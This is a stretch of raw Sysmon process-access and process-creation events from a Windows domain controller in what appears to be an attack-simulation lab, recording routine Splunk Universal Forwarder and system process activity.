13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8555-5FCF-6300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.072{10ACEC4A-8555-5FCF-6300-000000009101}3980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-7400-000000009101}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-7400-000000009101}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.867{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-7400-000000009101}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.870{10ACEC4A-8556-5FCF-7400-000000009101}2704C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-7300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYST